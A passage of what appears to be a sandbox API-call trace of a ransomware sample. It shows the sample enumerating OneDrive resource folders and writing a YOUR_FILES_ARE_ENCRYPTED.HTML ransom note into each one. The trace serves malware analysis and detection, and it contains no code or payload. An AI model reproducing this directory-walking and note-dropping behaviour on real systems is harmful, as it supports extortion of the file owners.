lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz\\*" [0113.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7458572, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7458572, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe791d114, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.678] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7458572, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7458572, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe791d114, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.678] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe791d114, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe791d114, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe7ba5701, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.678] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.678] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.678] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.678] lstrlenW (lpString=".mui") returned 4 [0113.678] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.678] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe791d114, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe791d114, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe7ba5701, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.678] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.678] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.678] GetProcessHeap () returned 0x600000 [0113.678] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\mi-nz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.685] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.689] CloseHandle (hObject=0x310) returned 1 [0113.689] GetProcessHeap () returned 0x600000 [0113.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.689] GetProcessHeap () returned 0x600000 [0113.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0113.691] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7c3dff7, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7c3dff7, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe7c3dff7, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mk", cAlternateFileName="")) returned 1 [0113.691] StrStrIW (lpFirst="mk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.691] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk") returned 78 [0113.691] GetProcessHeap () returned 0x600000 [0113.691] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.692] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk" [0113.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk\\*" [0113.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7c3dff7, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7c3dff7, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe7f391d8, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.692] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7c3dff7, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7c3dff7, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe7f391d8, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.692] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f391d8, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7f391d8, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe83b18d7, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.692] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.692] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.692] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.692] lstrlenW (lpString=".mui") returned 4 [0113.692] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.692] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f391d8, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7f391d8, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe83b18d7, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.692] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.692] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.692] GetProcessHeap () returned 0x600000 [0113.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\mk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.693] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.694] CloseHandle (hObject=0x310) returned 1 [0113.694] GetProcessHeap () returned 0x600000 [0113.694] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.694] GetProcessHeap () returned 0x600000 [0113.694] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.694] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe84e29e6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe84e29e6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe84e29e6, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ml-in", cAlternateFileName="")) returned 1 [0113.694] StrStrIW (lpFirst="ml-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.694] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in") returned 81 [0113.694] GetProcessHeap () returned 0x600000 [0113.695] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.695] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in" [0113.695] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in\\*" [0113.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe84e29e6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe84e29e6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe884ff12, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.695] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe84e29e6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe84e29e6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe884ff12, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.695] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe884ff12, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe884ff12, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe8c7c0a1, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x186c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.695] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.695] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.695] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.695] lstrlenW (lpString=".mui") returned 4 [0113.695] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.695] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe884ff12, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe884ff12, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe8c7c0a1, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x186c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.695] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.696] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.696] GetProcessHeap () returned 0x600000 [0113.696] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ml-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.696] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.697] CloseHandle (hObject=0x310) returned 1 [0113.697] GetProcessHeap () returned 0x600000 [0113.697] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.697] GetProcessHeap () returned 0x600000 [0113.697] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.698] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8d3ad1a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe8d3ad1a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe8d3ad1a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mn", cAlternateFileName="")) returned 1 [0113.698] StrStrIW (lpFirst="mn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.698] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn") returned 78 [0113.698] GetProcessHeap () returned 0x600000 [0113.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.699] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn" [0113.699] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn\\*" [0113.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8d3ad1a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe8d3ad1a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe905bcdb, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.699] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8d3ad1a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe8d3ad1a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe905bcdb, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.699] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe905bcdb, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe905bcdb, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xea041623, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.699] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.699] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.699] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.699] lstrlenW (lpString=".mui") returned 4 [0113.699] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.699] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe905bcdb, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe905bcdb, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xea041623, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.699] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.700] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.700] GetProcessHeap () returned 0x600000 [0113.700] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\mn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.700] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.701] CloseHandle (hObject=0x310) returned 1 [0113.701] GetProcessHeap () returned 0x600000 [0113.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.701] GetProcessHeap () returned 0x600000 [0113.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.702] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed466d7c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xed466d7c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xed466d7c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mr", cAlternateFileName="")) returned 1 [0113.703] StrStrIW (lpFirst="mr", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.703] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr") returned 78 [0113.703] GetProcessHeap () returned 0x600000 [0113.703] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.704] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr" [0113.704] lstrcatW (in: 